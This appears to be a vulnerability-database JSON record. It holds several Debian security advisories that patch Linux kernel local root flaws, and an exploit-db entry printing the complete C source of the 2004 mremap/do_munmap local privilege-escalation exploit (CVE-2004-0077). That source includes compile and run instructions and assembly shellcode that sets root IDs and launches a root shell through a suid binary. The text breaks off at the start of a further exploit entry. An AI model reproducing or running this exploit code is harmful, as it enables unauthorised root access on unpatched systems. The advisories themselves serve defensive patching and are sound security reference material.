http://security.debian.org/pool/updates/main/k/kernel-source-2.2.22/kernel-source-2.2.22_2.2.22-1woody1.diff.gz\n Size/MD5 checksum: 146548 51478245f5608894bbb59223172f9cb3\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.22/kernel-source-2.2.22_2.2.22.orig.tar.gz\n Size/MD5 checksum: 19313552 af9832dc10026cf03b2682f296ccd051\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.22-alpha/kernel-image-2.2.22-alpha_2.2.22-2.dsc\n Size/MD5 checksum: 870 ac538b47a782ae11686e2c5d0c3bb6f5\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.22-alpha/kernel-image-2.2.22-alpha_2.2.22-2.tar.gz\n Size/MD5 checksum: 7451 6107bb5e1e7ae0aa4e3f9417fced0717\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.22/kernel-doc-2.2.22_2.2.22-1woody1_all.deb\n Size/MD5 checksum: 1162368 805cf7d09f69b14ebcb392038de5a6b1\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.22/kernel-source-2.2.22_2.2.22-1woody1_all.deb\n Size/MD5 checksum: 15759754 55d31894b93cb9633caaa6a0eddbf998\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.22-alpha/kernel-headers-2.2.22_2.2.22-2_alpha.deb\n Size/MD5 checksum: 1871248 c762109e412ef7d3e31bebb868e668ce\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.22-alpha/kernel-image-2.2.22-generic_2.2.22-2_alpha.deb\n Size/MD5 checksum: 2782898 99c876bdab97812cb5ebdfdb1c88d224\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.22-alpha/kernel-image-2.2.22-jensen_2.2.22-2_alpha.deb\n Size/MD5 checksum: 2299174 ac17d87dbb6558c83b723fb97808f721\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.22-alpha/kernel-image-2.2.22-nautilus_2.2.22-2_alpha.deb\n Size/MD5 checksum: 2537032 9a3194224faccec6081ee06d9926be09\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.22-alpha/kernel-image-2.2.22-smp_2.2.22-2_alpha.deb\n Size/MD5 checksum: 2878172 6ad070e82c301504d845692688012fed\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2004-03-02T00:00:00", "published": "2004-03-02T00:00:00", "id": "DEBIAN:DSA-454-1:8FBF7", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00051.html", "title": "[SECURITY] [DSA 454-1] New Linux 2.2.22 packages fix local root exploit (alpha)", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:19:59", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0961", "CVE-2003-0985", "CVE-2004-0077"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 475-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nApril 5th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-image-2.4.17-hppa\nVulnerability : several vulnerabilities\nProblem-Type : local\nDebian-specific: no\nCVE ID : CAN-2003-0961 CAN-2003-0985 CAN-2004-0077\n\nSeveral local root exploits have been discovered recently in the Linux\nkernel. This security advisory updates the PA-RISC kernel 2.4.18 for\nDebian GNU/Linux. The Common Vulnerabilities and Exposures project\nidentifies the following problems that are fixed with this update:\n\nCAN-2003-0961:\n\n An integer overflow in brk() system call (do_brk() function) for\n Linux allows a local attacker to gain root privileges. Fixed\n upstream in Linux 2.4.23.\n\nCAN-2003-0985:\n\n Paul Starzetz discovered a flaw in bounds checking in mremap() in\n the Linux kernel (present in version 2.4.x and 2.6.x) which may\n allow a local attacker to gain root privileges. Version 2.2 is not\n affected by this bug. Fixed upstream in Linux 2.4.24.\n\nCAN-2004-0077:\n\n Paul Starzetz and Wojciech Purczynski of isec.pl discovered a\n critical security vulnerability in the memory management code of\n Linux inside the mremap(2) system call. Due to missing function\n return value check of internal functions a local attacker can gain\n root privileges. Fixed upstream in Linux 2.4.25 and 2.6.3.\n\nPlease note that the source package has to include a lot of updates in\norder to compile the package, which wasn't possible with the old\nsource package.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 62.1 of kernel-image-2.4.18-hppa.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 2.4.25-1 of kernel-image-2.4.25-hppa.\n\nWe recommend that you upgrade your Linux kernel packages immediately.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-hppa/kernel-image-2.4.18-hppa_62.1.dsc\n Size/MD5 checksum: 713 b04fb5bfad0a9a46fcda5e0afe95d2ac\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-hppa/kernel-image-2.4.18-hppa_62.1.tar.gz\n Size/MD5 checksum: 29943063 7c7e44c64bb8e69800469e5143e4a315\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-hppa/kernel-source-2.4.18-hppa_62.1_all.deb\n Size/MD5 checksum: 24090548 5b9c3bd3702f00b4a5f1a52d641dbb4d\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-hppa/kernel-headers-2.4.18-hppa_62.1_hppa.deb\n Size/MD5 checksum: 3503082 9cd62749253e897d5b901e5018e471f7\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-hppa/kernel-image-2.4.18-32_62.1_hppa.deb\n Size/MD5 checksum: 2774300 f32542b074f6a272b7c31685a2e96060\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-hppa/kernel-image-2.4.18-32-smp_62.1_hppa.deb\n Size/MD5 checksum: 2913666 878bcc9861b13e7e063dd6570aa53bdb\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-hppa/kernel-image-2.4.18-64_62.1_hppa.deb\n Size/MD5 checksum: 3074252 b5e96c96b464f2740eaf08513216e205\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-hppa/kernel-image-2.4.18-64-smp_62.1_hppa.deb\n Size/MD5 checksum: 3215442 702faf5c0bf94fbcb9883c5c2601a5c4\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 3, "modified": "2004-04-05T00:00:00", "published": "2004-04-05T00:00:00", "id": "DEBIAN:DSA-475-1:31307", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00073.html", "title": "[SECURITY] [DSA 475-1] New Linux 2.4.18 packages fix several local root exploits (hppa)", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:28:27", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0961", "CVE-2003-0985", "CVE-2004-0077"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 470-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nApril 1st, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-image-2.4.17-hppa\nVulnerability : several vulnerabilities\nProblem-Type : local\nDebian-specific: no\nCVE ID : CAN-2003-0961 CAN-2003-0985 CAN-2004-0077\n\nSeveral local root exploits have been discovered recently in the Linux\nkernel. This security advisory updates the mips kernel 2.4.19 for\nDebian GNU/Linux. The Common Vulnerabilities and Exposures project\nidentifies the following problems that are fixed with this update:\n\nCAN-2003-0961:\n\n An integer overflow in brk() system call (do_brk() function) for\n Linux allows a local attacker to gain root privileges. Fixed\n upstream in Linux 2.4.23.\n\nCAN-2003-0985:\n\n Paul Starzetz discovered a flaw in bounds checking in mremap() in\n the Linux kernel (present in version 2.4.x and 2.6.x) which may\n allow a local attacker to gain root privileges. Version 2.2 is not\n affected by this bug. Fixed upstream in Linux 2.4.24.\n\nCAN-2004-0077:\n\n Paul Starzetz and Wojciech Purczynski of isec.pl discovered a\n critical security vulnerability in the memory management code of\n Linux inside the mremap(2) system call. Due to missing function\n return value check of internal functions a local attacker can gain\n root privileges. Fixed upstream in Linux 2.4.25 and 2.6.3.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 32.3 of kernel-image-2.4.17-hppa.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 2.4.25-1 of kernel-image-2.4.25-hppa.\n\nWe recommend that you upgrade your Linux kernel packages immediately.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-hppa_32.3.dsc\n Size/MD5 checksum: 713 f5b7956a75870aaff51ccb52c96a0ab2\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-hppa_32.3.tar.gz\n Size/MD5 checksum: 29958048 44cb813807b9b1c45984fadfc18d4ba1\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-source-2.4.17-hppa_32.3_all.deb\n Size/MD5 checksum: 24109698 cefc1a3ebfce0d30f97b556ed62674d4\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-headers-2.4.17-hppa_32.3_hppa.deb\n Size/MD5 checksum: 3531296 605f593d9648fd2ab1aa2d6f106263af\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-32_32.3_hppa.deb\n Size/MD5 checksum: 2737992 793396152e7dea3f9a1ea8ea10c4dbe7\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-32-smp_32.3_hppa.deb\n Size/MD5 checksum: 2870174 2f2df476a902378a9efa96a79367eed2\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-64_32.3_hppa.deb\n Size/MD5 checksum: 3024282 1a687ccbedbba298a7e98ba7d2b20650\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-64-smp_32.3_hppa.deb\n Size/MD5 checksum: 3165702 795b734b1e17a75a76c40af8f49e6ec7\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 3, "modified": "2004-04-01T00:00:00", "published": "2004-04-01T00:00:00", "id": "DEBIAN:DSA-470-1:2C55A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00067.html", "title": "[SECURITY] [DSA 470-1] New Linux 2.4.17 packages fix several local root exploits (hppa)", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:22:36", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0961", "CVE-2003-0985", "CVE-2004-0077"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 450-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nFebruary 27th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-source-2.4.19, kernel-patch-2.4.19-mips\nVulnerability : several vulnerabilities\nProblem-Type : local\nDebian-specific: no\nCVE ID : CAN-2003-0961 CAN-2003-0985 CAN-2004-0077\n\nSeveral local root exploits have been discovered recently in the Linux\nkernel. This security advisory updates the mips kernel 2.4.19 for\nDebian GNU/Linux. The Common Vulnerabilities and Exposures project\nidentifies the following problems that are fixed with this update:\n\nCAN-2003-0961:\n\n An integer overflow in brk() system call (do_brk() function) for\n Linux allows a local attacker to gain root privileges. Fixed\n upstream in Linux 2.4.23.\n\nCAN-2003-0985:\n\n Paul Starzetz discovered a flaw in bounds checking in mremap() in\n the Linux kernel (present in version 2.4.x and 2.6.x) which may\n allow a local attacker to gain root privileges. Version 2.2 is not\n affected by this bug. Fixed upstream in Linux 2.4.24.\n\nCAN-2004-0077:\n\n Paul Starzetz and Wojciech Purczynski of isec.pl discovered a\n critical security vulnerability in the memory management code of\n Linux inside the mremap(2) system call. Due to missing function\n return value check of internal functions a local attacker can gain\n root privileges. Fixed upstream in Linux 2.4.25 and 2.6.3.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 2.4.19-0.020911.1.woody3 of mips images and version\n2.4.19-4.woody1 of kernel source.\n\nFor the unstable distribution (sid) this problem will be fixed soon\nwith the next upload of a 2.4.19 kernel image and in version\n2.4.22-0.030928.3 for 2.4.22.\n\nWe recommend that you upgrade your Linux kernel packages immediately.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody1.dsc\n Size/MD5 checksum: 672 7bbdd141827b2a7c6e5d3dc0ec1419aa\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody1.diff.gz\n Size/MD5 checksum: 40736 2a4fa2f28b3af1ba4247255cf1cab05d\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19.orig.tar.gz\n Size/MD5 checksum: 32000211 237896fbb45ae652cc9c5cecc9b746da\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody3.dsc\n Size/MD5 checksum: 792 767aee163c5c3fccbddf1f917d06488c\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody3.tar.gz\n Size/MD5 checksum: 1020287 80c1f72a99eaf113161c589ec49b06f6\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-doc-2.4.19_2.4.19-4.woody1_all.deb\n Size/MD5 checksum: 1782662 b8ade5f98fcb9f3a5627d688467eddcb\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody1_all.deb\n Size/MD5 checksum: 25892640 b22804d26e298f7f02e51d48d31da2dc\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody3_all.deb\n Size/MD5 checksum: 1020394 ba072ba9f904251c7327ccbeedaa8f20\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-headers-2.4.19_2.4.19-0.020911.1.woody3_mips.deb\n Size/MD5 checksum: 3918150 d1d65ee7cfabcf71efc5d06ac78f6319\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r4k-ip22_2.4.19-0.020911.1.woody3_mips.deb\n Size/MD5 checksum: 2075108 8f41b6344fe92ba16e69a623c8e3a9b7\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r5k-ip22_2.4.19-0.020911.1.woody3_mips.deb\n Size/MD5 checksum: 2075486 e53315d4e51e49d809e83191d945a4f8\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/mips-tools_2.4.19-0.020911.1.woody3_mips.deb\n Size/MD5 checksum: 12842 b65ca394f3fe542c68787794ee5a4337\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2004-02-27T00:00:00", "published": "2004-02-27T00:00:00", "id": "DEBIAN:DSA-450-1:2B3D9", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00047.html", "title": "[SECURITY] [DSA 450-1] New Linux 2.4.19 packages fix several local root exploits (mips)", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-01-31T11:50:23", "description": "Linux Kernel 2.x mremap missing do_munmap Exploit. CVE-2004-0077. Local exploit for linux platform", "published": "2004-03-01T00:00:00", "type": "exploitdb", "title": "Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - \"mremap\" Missing \"do_munmap\" Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0077"], "modified": "2004-03-01T00:00:00", "id": "EDB-ID:160", "href": "https://www.exploit-db.com/exploits/160/", "sourceData": "/*\r\n *\r\n *\tmremap missing do_munmap return check kernel exploit\r\n *\r\n *\tgcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte\r\n *\t./mremap_pte [suid] [[shell]]\r\n *\t\r\n *\tVulnerable kernel versions are all <= 2.2.25, <= 2.4.24 and <= 2.6.2\r\n *\r\n *\tCopyright (c) 2004 iSEC Security Research. All Rights Reserved.\r\n *\r\n *\tTHIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED \"AS IS\"\r\n *\tAND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION\r\n *\tWITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <errno.h>\r\n#include <unistd.h>\r\n#include <syscall.h>\r\n#include <signal.h>\r\n#include <time.h>\r\n#include <sched.h>\r\n\r\n#include <sys/mman.h>\r\n#include <sys/wait.h>\r\n#include <sys/utsname.h>\r\n\r\n#include <asm/page.h>\r\n\r\n\r\n#define str(s) #s\r\n#define xstr(s) str(s)\r\n\r\n//\tthis is for standard kernels with 3/1 split\r\n#define STARTADDR\t0x40000000\r\n#define PGD_SIZE\t(PAGE_SIZE * 1024)\r\n#define VICTIM\t\t(STARTADDR + PGD_SIZE)\r\n#define MMAP_BASE\t(STARTADDR + 3*PGD_SIZE)\r\n\r\n#define DSIGNAL\t\tSIGCHLD\r\n#define CLONEFL\t\t(DSIGNAL|CLONE_VFORK|CLONE_VM)\r\n\r\n#define MREMAP_MAYMOVE\t( (1UL) << 0 )\r\n#define MREMAP_FIXED\t( (1UL) << 1 )\r\n\r\n#define __NR_sys_mremap\t__NR_mremap\r\n\r\n\r\n//\thow many ld.so pages? this is the .text section length (like cat \t\r\n//\t/proc/self/maps) in pages\r\n#define LINKERPAGES\t0x14\r\n\r\n//\tsuid victim\r\nstatic char *suid=\"/bin/ping\";\r\n\r\n//\tshell to start\r\nstatic char *launch=\"/bin/bash\";\r\n\r\n\r\n_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, \t\t\r\n\t ulong, e);\r\nunsigned long sys_mremap(unsigned long addr, unsigned long old_len, \r\n\t\t\t unsigned long new_len, unsigned long flags, \r\n\t\t\t unsigned long new_addr);\r\n\r\nstatic volatile unsigned base, *t, cnt, old_esp, prot, victim=0;\r\nstatic int i, pid=0;\r\nstatic char *env[2], *argv[2];\r\nstatic ulong ret;\r\n\r\n\r\n//\tcode to appear inside the suid image\r\nstatic void suid_code(void)\r\n{\r\n__asm__(\r\n\t\"\t\tcall\tcallme\t\t\t\t\\n\"\r\n\r\n//\tsetresuid(0, 0, 0), setresgid(0, 0, 0)\r\n\t\"jumpme:\txorl\t%ebx, %ebx\t\t\t\\n\"\r\n\t\"\t\txorl\t%ecx, %ecx\t\t\t\\n\"\r\n\t\"\t\txorl\t%edx, %edx\t\t\t\\n\"\r\n\t\"\t\txorl\t%eax, %eax\t\t\t\\n\"\r\n\t\"\t\tmov\t$\"xstr(__NR_setresuid)\", %al\t\\n\"\r\n\t\"\t\tint\t$0x80\t\t\t\t\\n\"\r\n\t\"\t\tmov\t$\"xstr(__NR_setresgid)\", %al\t\\n\"\r\n\t\"\t\tint\t$0x80\t\t\t\t\\n\"\r\n\r\n//\texecve(launch)\r\n\t\"\t\tpopl\t%ebx\t\t\t\t\\n\"\r\n\t\"\t\tandl\t$0xfffff000, %ebx\t\t\\n\"\r\n\t\"\t\txorl\t%eax, %eax\t\t\t\\n\"\r\n\t\"\t\tpushl\t%eax\t\t\t\t\\n\"\r\n\t\"\t\tmovl\t%esp, %edx\t\t\t\\n\"\r\n\t\"\t\tpushl\t%ebx\t\t\t\t\\n\"\r\n\t\"\t\tmovl\t%esp, %ecx\t\t\t\\n\"\r\n\t\"\t\tmov\t$\"xstr(__NR_execve)\", %al\t\\n\"\r\n\t\"\t\tint\t$0x80\t\t\t\t\\n\"\r\n\r\n//\texit\r\n\t\"\t\txorl\t%eax, %eax\t\t\t\\n\"\r\n\t\"\t\tmov\t$\"xstr(__NR_exit)\", %al\t\t\\n\"\r\n\t\"\t\tint\t$0x80\t\t\t\t\\n\"\r\n\r\n\t\"callme:\tjmp\tjumpme\t\t\t\t\\n\"\r\n\t);\r\n}\r\n\r\n\r\nstatic int suid_code_end(int v)\r\n{\r\nreturn v+1;\r\n}\r\n\r\n\r\nstatic inline void get_esp(void)\r\n{\r\n__asm__(\r\n\t\"\t\tmovl\t%%esp, %%eax\t\t\t\\n\"\r\n\t\"\t\tandl\t$0xfffff000, %%eax\t\t\\n\"\r\n\t\"\t\tmovl\t%%eax, %0\t\t\t\\n\"\r\n\t: : \"m\"(old_esp)\r\n\t);\r\n}\r\n\r\n\r\nstatic inline void cloneme(void)\r\n{\r\n__asm__(\r\n\t\"\t\tpusha\t\t\t\t\t\\n\"\r\n\t\"\t\tmovl $(\"xstr(CLONEFL)\"), %%ebx\t\t\\n\"\r\n\t\"\t\tmovl %%esp, %%ecx\t\t\t\\n\"\r\n\t\"\t\tmovl $\"xstr(__NR_clone)\", %%eax\t\t\\n\"\r\n\t\"\t\tint $0x80\t\t\t\t\\n\"\r\n\t\"\t\tmovl %%eax, %0\t\t\t\t\\n\"\r\n\t\"\t\tpopa\t\t\t\t\t\\n\"\r\n\t: : \"m\"(pid)\r\n\t);\r\n}\r\n\r\n\r\nstatic inline void my_execve(void)\r\n{\r\n__asm__(\r\n\t\"\t\tmovl %1, %%ebx\t\t\t\t\\n\"\r\n\t\"\t\tmovl %2, %%ecx\t\t\t\t\\n\"\r\n\t\"\t\tmovl %3, %%edx\t\t\t\t\\n\"\r\n\t\"\t\tmovl $\"xstr(__NR_execve)\", %%eax\t\\n\"\r\n\t\"\t\tint $0x80\t\t\t\t\\n\"\r\n\t: \"=a\"(ret)\r\n\t: \"m\"(suid), \"m\"(argv), \"m\"(env)\r\n\t);\r\n}\r\n\r\n\r\nstatic inline void pte_populate(unsigned addr)\r\n{\r\nunsigned r;\r\nchar *ptr;\r\n\r\n\tmemset((void*)addr, 0x90, PAGE_SIZE);\r\n\tr = ((unsigned)suid_code_end) - ((unsigned)suid_code);\r\n\tptr = (void*) (addr + PAGE_SIZE);\r\n\tptr -= r+1;\r\n\tmemcpy(ptr, suid_code, r);\r\n\tmemcpy((void*)addr, launch, strlen(launch)+1);\r\n}\r\n\r\n\r\n//\thit VMA limit & populate PTEs\r\nstatic void exhaust(void)\r\n{\r\n//\tmmap PTE donor\r\n\tt = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE,\r\n\t\t MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);\r\n\tif(MAP_FAILED==t)\r\n\t\tgoto failed;\r\n\r\n//\tprepare shell code pages\r\n\tfor(i=2; i<LINKERPAGES+1; i++)\r\n\t\tpte_populate(victim + PAGE_SIZE*i);\r\n\ti = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ);\r\n\tif(i)\r\n\t\tgoto failed;\r\n\r\n//\tlock unmap\r\n\tbase = MMAP_BASE;\r\n\tcnt = 0;\r\n\tprot = PROT_READ;\r\n\tprintf(\"\\n\"); fflush(stdout);\r\n\tfor(;;) {\r\n\t\tt = mmap((void*)base, PAGE_SIZE, prot, \r\n\t\t\t MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);\r\n\t\tif(MAP_FAILED==t) {\r\n\t\t\tif(ENOMEM==errno)\r\n\t\t\t\tbreak;\r\n\t\t\telse\r\n\t\t\t\tgoto failed;\r\n\t\t}\r\n\t\tif( !(cnt%512) || cnt>65520 )\r\n\t\t\tprintf(\"\\r MMAP #%d 0x%.8x - 0x%.8lx\", cnt, base,\r\n\t\t\tbase+PAGE_SIZE); fflush(stdout);\r\n\t\tbase += PAGE_SIZE;\r\n\t\tprot ^= PROT_EXEC;\r\n\t\tcnt++;\r\n\t}\r\n\r\n//\tmove PTEs & populate page table cache\r\n\tret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE,\t\r\n\t\t\t MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM);\r\n\tif(-1==ret)\r\n\t\tgoto failed;\r\n\r\n\tmunmap((void*)MMAP_BASE, old_esp-MMAP_BASE);\r\n\tt = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE, \t\t\r\n\t\t PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, \r\n\t\t 0);\r\n\tif(MAP_FAILED==t)\r\n\t\tgoto failed;\r\n\r\n\t*t = *((unsigned *)old_esp);\r\n\tmunmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE));\r\n\tprintf(\"\\n[+] Success\\n\\n\"); fflush(stdout);\r\n\treturn;\r\n\r\nfailed:\r\n\tprintf(\"\\n[-] Failed\\n\"); fflush(stdout);\r\n\t_exit(0);\r\n}\r\n\r\n\r\nstatic inline void check_kver(void)\r\n{\r\nstatic struct utsname un;\r\nint a=0, b=0, c=0, v=0, e=0, n;\r\n\r\n\tuname(&un);\r\n\tn=sscanf(un.release, \"%d.%d.%d\", &a, &b, &c);\r\n\tif(n!=3 || a!=2) {\r\n\t\tprintf(\"\\n[-] invalid kernel version string\\n\");\r\n\t\t_exit(0);\r\n\t}\r\n\r\n\tif(b==2) {\r\n\t\tif(c<=25)\r\n\t\t\tv=1;\r\n\t}\r\n\telse if(b==3) {\r\n\t\tif(c<=99)\r\n\t\t\tv=1;\r\n\t}\r\n\telse if(b==4) {\r\n\t\tif(c>18 && c<=24)\r\n\t\t\tv=1, e=1;\r\n\t\telse if(c>24)\r\n\t\t\tv=0, e=0;\r\n\t\telse\r\n\t\t\tv=1, e=0;\r\n\t}\r\n\telse if(b==5 && c<=75)\r\n\t\tv=1, e=1;\r\n\telse if(b==6 && c<=2)\r\n\t\tv=1, e=1;\r\n\r\n\tprintf(\"\\n[+] kernel %s vulnerable: %s exploitable %s\",\r\n\t\tun.release, v? \"YES\" : \"NO\", e? \"YES\" : \"NO\" );\r\n\tfflush(stdout);\r\n\r\n\tif(v && e)\r\n\t\treturn;\r\n\t_exit(0);\r\n}\r\n\r\n\r\nint main(int ac, char **av)\r\n{\r\n//\tprepare\r\n\tcheck_kver();\r\n\tmemset(env, 0, sizeof(env));\r\n\tmemset(argv, 0, sizeof(argv));\r\n\tif(ac>1) suid=av[1];\r\n\tif(ac>2) launch=av[2];\r\n\targv[0] = suid;\r\n\tget_esp();\r\n\r\n//\tmmap & clone & execve\r\n\texhaust();\r\n\tcloneme();\r\n\tif(!pid) {\r\n\t\tmy_execve();\r\n\t} else {\r\n\t\twaitpid(pid, 0, 0);\r\n\t}\r\n\r\nreturn 0;\r\n}\r\n\r\n// milw0rm.com [2004-03-01]\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/160/"}, {"lastseen": "2016-01-31T11:49:38", "description": "Linux Kernel \"mremap()\"#2 Local Proof-of-concept. CVE-2004-0077. Local exploit for linux platform", "published": 